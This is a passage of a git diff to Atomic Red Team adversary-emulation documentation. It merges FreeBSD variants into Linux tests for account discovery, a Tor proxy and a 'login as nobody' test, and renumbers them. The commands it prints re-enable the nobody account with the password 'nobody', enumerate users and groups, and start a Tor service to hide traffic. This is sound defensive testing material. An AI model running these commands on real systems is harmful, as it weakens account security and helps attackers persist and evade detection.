 An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin.
 
 **Supported Platforms:** Linux
@@ -466,7 +427,7 @@ cat /etc/passwd |grep nobody
 <br/>
 <br/>
 
-## Atomic Test #13 - Login as nobody (freebsd)
+## Atomic Test #12 - Login as nobody (freebsd)
 An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin.
 
 **Supported Platforms:** Linux
diff --git a/atomics/T1087.001/T1087.001.md b/atomics/T1087.001/T1087.001.md
index a274c99d0..2bb05cf54 100644
--- a/atomics/T1087.001/T1087.001.md
+++ b/atomics/T1087.001/T1087.001.md
@@ -16,17 +16,15 @@ Commands such as <code>net user</code> and <code>net localgroup</code> of the [N
 
 - [Atomic Test #5 - Show if a user account has ever logged in remotely](#atomic-test-5---show-if-a-user-account-has-ever-logged-in-remotely)
 
-- [Atomic Test #6 - Show if a user account has ever logged in remotely (freebsd)](#atomic-test-6---show-if-a-user-account-has-ever-logged-in-remotely-freebsd)
+- [Atomic Test #6 - Enumerate users and groups](#atomic-test-6---enumerate-users-and-groups)
 
 - [Atomic Test #7 - Enumerate users and groups](#atomic-test-7---enumerate-users-and-groups)
 
-- [Atomic Test #8 - Enumerate users and groups](#atomic-test-8---enumerate-users-and-groups)
+- [Atomic Test #8 - Enumerate all accounts on Windows (Local)](#atomic-test-8---enumerate-all-accounts-on-windows-local)
 
-- [Atomic Test #9 - Enumerate all accounts on Windows (Local)](#atomic-test-9---enumerate-all-accounts-on-windows-local)
+- [Atomic Test #9 - Enumerate all accounts via PowerShell (Local)](#atomic-test-9---enumerate-all-accounts-via-powershell-local)
 
-- [Atomic Test #10 - Enumerate all accounts via PowerShell (Local)](#atomic-test-10---enumerate-all-accounts-via-powershell-local)
-
-- [Atomic Test #11 - Enumerate logged on users via CMD (Local)](#atomic-test-11---enumerate-logged-on-users-via-cmd-local)
+- [Atomic Test #10 - Enumerate logged on users via CMD (Local)](#atomic-test-10---enumerate-logged-on-users-via-cmd-local)
 
 
 <br/>
@@ -209,7 +207,8 @@ Show if a user account has ever logged in remotely
 
 
 ```sh
-lastlog > #{output_file}
+[ "$(uname)" = 'FreeBSD' ] && cmd="lastlogin" || cmd="lastlog" 
+$cmd > #{output_file}
 cat #{output_file}
 ```
 
@@ -237,45 +236,7 @@ sudo apt-get install login; exit 1;
 <br/>
 <br/>
 
-## Atomic Test #6 - Show if a user account has ever logged in remotely (freebsd)
-Show if a user account has ever logged in remotely
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 0f73418f-d680-4383-8a24-87bc97fe4e35
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| output_file | Path where captured results will be placed | path | /tmp/T1087.001.txt|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-lastlogin > #{output_file}
-cat #{output_file}
-```
-
-#### Cleanup Commands:
-```sh
-rm -f #{output_file}
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Enumerate users and groups
+## Atomic Test #6 - Enumerate users and groups
 Utilize groups and id to enumerate users and groups
 
 **Supported Platforms:** Linux, macOS
@@ -304,7 +265,7 @@ id
 <br/>
 <br/>
 
-## Atomic Test #8 - Enumerate users and groups
+## Atomic Test #7 - Enumerate users and groups
 Utilize local utilities to enumerate users and groups
 
 **Supported Platforms:** macOS
@@ -336,7 +297,7 @@ dscacheutil -q user
 <br/>
 <br/>
 
-## Atomic Test #9 - Enumerate all accounts on Windows (Local)
+## Atomic Test #8 - Enumerate all accounts on Windows (Local)
 Enumerate all accounts
 Upon execution, multiple enumeration commands will be run and their output displayed in the PowerShell session
 
@@ -369,7 +330,7 @@ net localgroup
 <br/>
 <br/>
 
-## Atomic Test #10 - Enumerate all accounts via PowerShell (Local)
+## Atomic Test #9 - Enumerate all accounts via PowerShell (Local)
 Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
 
 **Supported Platforms:** Windows
@@ -405,7 +366,7 @@ net localgroup
 <br/>
 <br/>
 
-## Atomic Test #11 - Enumerate logged on users via CMD (Local)
+## Atomic Test #10 - Enumerate logged on users via CMD (Local)
 Enumerate logged on users. Upon execution, logged on users will be displayed.
 
 **Supported Platforms:** Windows
diff --git a/atomics/T1090.003/T1090.003.md b/atomics/T1090.003/T1090.003.md
index 20ff12f68..19e6735f3 100644
--- a/atomics/T1090.003/T1090.003.md
+++ b/atomics/T1090.003/T1090.003.md
@@ -10,12 +10,10 @@ In the case of network infrastructure, particularly routers, it is possible for
 
 - [Atomic Test #2 - Tor Proxy Usage - Windows](#atomic-test-2---tor-proxy-usage---windows)
 
-- [Atomic Test #3 - Tor Proxy Usage - Debian/Ubuntu](#atomic-test-3---tor-proxy-usage---debianubuntu)
+- [Atomic Test #3 - Tor Proxy Usage - Debian/Ubuntu/FreeBSD](#atomic-test-3---tor-proxy-usage---debianubuntufreebsd)
 
 - [Atomic Test #4 - Tor Proxy Usage - MacOS](#atomic-test-4---tor-proxy-usage---macos)
 
-- [Atomic Test #5 - Tor Proxy Usage - FreeBSD](#atomic-test-5---tor-proxy-usage---freebsd)
-
 
 <br/>
 
@@ -142,7 +140,7 @@ expand-archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\tor.zip" -D
 <br/>
 <br/>
 
-## Atomic Test #3 - Tor Proxy Usage - Debian/Ubuntu
+## Atomic Test #3 - Tor Proxy Usage - Debian/Ubuntu/FreeBSD
 This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
 Upon successful execution, the tor proxy service will be launched.
 
@@ -160,12 +158,12 @@ Upon successful execution, the tor proxy service will be launched.
 
 
 ```sh
-sudo systemctl start tor
+[ "$(uname)" = 'FreeBSD' ] && sysrc tor_enable="YES" && service tor start || sudo systemctl start tor
 ```
 
 #### Cleanup Commands:
 ```sh
-sudo systemctl stop tor
+[ "$(uname)" = 'FreeBSD' ] && service tor stop && sysrc -x tor_enable || sudo systemctl stop tor
 ```
 
 
@@ -178,7 +176,7 @@ if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi
 ```
 ##### Get Prereq Commands:
 ```sh
-sudo apt-get -y install tor
+(which apt && sudo apt-get -y install tor) || (which pkg && pkg install -y tor)
 ```
 
 
@@ -230,51 +228,4 @@ brew install tor
 
 
 
-<br/>
-<br/>
-
-## Atomic Test #5 - Tor Proxy Usage - FreeBSD
-This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
-Upon successful execution, the tor proxy service will be launched.
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 550ec67d-a99e-408b-816a-689271b27d2a
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
-
-```sh
-sysrc tor_enable="YES"
-service tor start
-```
-
-#### Cleanup Commands:
-```sh
-service tor stop
-sysrc -x tor_enable
-```
-
-
-
-#### Dependencies:  Run with `sh`!
-##### Description: Tor must be installed on the machine
-##### Check Prereq Commands:
-```sh
-if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi
-```
-##### Get Prereq Commands:
-```sh
-pkg install -y tor
-```
-
-
-
-
 <br/>